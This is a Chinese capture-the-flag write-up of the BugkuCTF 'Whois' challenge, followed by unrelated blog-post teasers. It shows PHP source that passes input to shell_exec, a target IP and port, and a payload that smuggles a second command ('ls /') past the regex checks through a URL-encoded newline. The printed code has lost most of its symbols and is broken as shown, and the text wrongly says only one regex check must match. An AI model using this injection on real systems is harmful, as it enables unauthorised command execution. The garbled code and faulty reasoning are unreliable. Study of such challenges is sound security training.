【BugkuCTF】Whois

张

张建站

2026/4/23 10:47:57

10分钟阅读

【BugkuCTF】Whois

直接访问http://49.232.142.230:15900/query.php会直接爆出源码?php error_reporting(0); $output null; $host_regex /^[0-9a-zA-Z][0-9a-zA-Z\.-]$/; $query_regex /^[0-9a-zA-Z\. ]$/; if (isset($_GET[query]) isset($_GET[host]) is_string($_GET[query]) is_string($_GET[host])) { $query $_GET[query]; $host $_GET[host]; if ( !preg_match($host_regex, $host) || !preg_match($query_regex, $query) ) { $output Invalid query or whois host; } else { $output shell_exec(/usr/bin/whois -h ${host} ${query}); } } else { highlight_file(__FILE__); exit; } ? !DOCTYPE html html head titleWhois/title /head body pre? htmlspecialchars($output) ?/pre /body /html具体执行的命令大概如下所示/usr/bin/whois -h whois.verisign-grs.com baidu.com但是这里需要绕正则通过正则可知我们无法使用常规的方法来拼接命令# host参数只能由0-9、a-z、A-Z、.点、-减号以及\n或者\r 组成 $host_regex /^[0-9a-zA-Z][0-9a-zA-Z\.-]$/; # query参数只能由0-9、a-z、A-Z、.点、空格以及\n或者\r组成 $query_regex /^[0-9a-zA-Z\. ]$/;可以看到\n换行符和\r回车符是可以用的\n的url编码是%0a\r的url编码是%0d原理是因为正则表达式没有模式符m开启多行搜索因此不会匹配\n、\r假设你构造的payload是hostwhois.verisign-grs.com%0a queryls /preg_match匹配到的内容是whois.verisign-grs.com而且由于代码中是或关系只要有一个能匹配成功就可以执行shell_execif ( !preg_match($host_regex, $host) || !preg_match($query_regex, $query) ) { $output Invalid query or whois host; } else { $output shell_exec(/usr/bin/whois -h ${host} ${query}); }那么到了后端php解析交给linux执行的命令就成了这样因为\n%0a 强制执行当前命令这样就执行两条命令/usr/bin/whois -h whois.verisign-grs.com ls /

机器学习实战：5大免费数据集入门指南

机器学习实战：5大免费数据集入门指南

1. 机器学习入门必备：5个免费数据集实战指南刚学完机器学习课程的朋友们常会遇到一个尴尬问题——学了一堆算法和理论，却找不到合适的数据集来练手。市面上的优质数据集往往价格不菲，而自己爬取数据又面临质量和合法性风险。作为过来人&#…...

2026/4/23 10:42:24 阅读更多 →

CAD-AutoLISP实战：从选择集到符号表，构建自动化绘图工具箱

CAD-AutoLISP实战：从选择集到符号表，构建自动化绘图工具箱

1. 选择集：批量操作CAD图元的高效工具在CAD绘图中，我们经常需要对大量图元进行相同操作。比如要把图纸中所有半径小于5mm的圆放大两倍，或者要把特定图层上的所有文字改成统一字体。这时候如果一个个手动修改，不仅效率低下还容易出…...

2026/4/23 10:41:01 阅读更多 →

Python通达信数据接口完整指南：免费获取A股行情与财务数据

Python通达信数据接口完整指南：免费获取A股行情与财务数据

Python通达信数据接口完整指南：免费获取A股行情与财务数据【免费下载链接】mootdx 通达信数据读取的一个简便使用封装项目地址: https://gitcode.com/GitHub_Trending/mo/mootdx 在金融数据分析和量化投资领域，获取准确、及时的股票数据是每个开…...

2026/4/23 10:40:50 阅读更多 →

Vim党进阶指南：巧用Ctags与Cscope过滤文件，让你的代码跳转快如闪电（避坑tags过大）

Vim党进阶指南：巧用Ctags与Cscope过滤文件，让你的代码跳转快如闪电（避坑tags过大）

Vim党进阶指南：巧用Ctags与Cscope过滤文件，让你的代码跳转快如闪电（避坑tags过大） 第一次在大型代码库中用Vim跳转函数时，我盯着屏幕上的沙漏图标足足等了7秒——这简直是对"编辑器之神"的亵渎。直到发现.so…...

2026/4/22 0:57:54 阅读更多 →

支付回调幂等与对账怎么设计？一次讲清重复通知、状态校验、补单与差异修复

支付回调幂等与对账怎么设计？一次讲清重复通知、状态校验、补单与差异修复

支付回调幂等与对账怎么设计？一次讲清重复通知、状态校验、补单与差异修复大家好，我是一名有 4 年工作经验的 Java 后端开发。支付回调看起来只是一个回调接口，但真正做过的人都知道，这几乎是订单系统里最容易出问题、也最需要兜…...

2026/4/22 1:32:29 阅读更多 →

Go语言如何用定时器_Go语言time.Ticker定时器教程【详解】

Go语言如何用定时器_Go语言time.Ticker定时器教程【详解】

使用 time.AfterFunc 或手动延迟首次触发：先创建 ticker，再用 time.AfterFunc 延迟首次操作，或用 time.Timer 替代，避免 NewTicker 启动即触发。time.Ticker 一启动就触发，怎么避免第一次立即执行？默认情况…...

2026/4/22 21:06:23 阅读更多 →

SQL嵌套查询导致内存溢出_改写为连接查询的方法

SQL嵌套查询导致内存溢出_改写为连接查询的方法

嵌套查询易爆内存因外层每行触发内层重复执行，无索引时致海量全表扫描与临时表膨胀；应改用带前置过滤和索引的JOIN，并验证执行计划、结果行数及字段类型一致性。为什么嵌套查询会爆内存因为数据库执行 IN 或 EXISTS 子查询时，常会…...

2026/4/22 5:19:36 阅读更多 →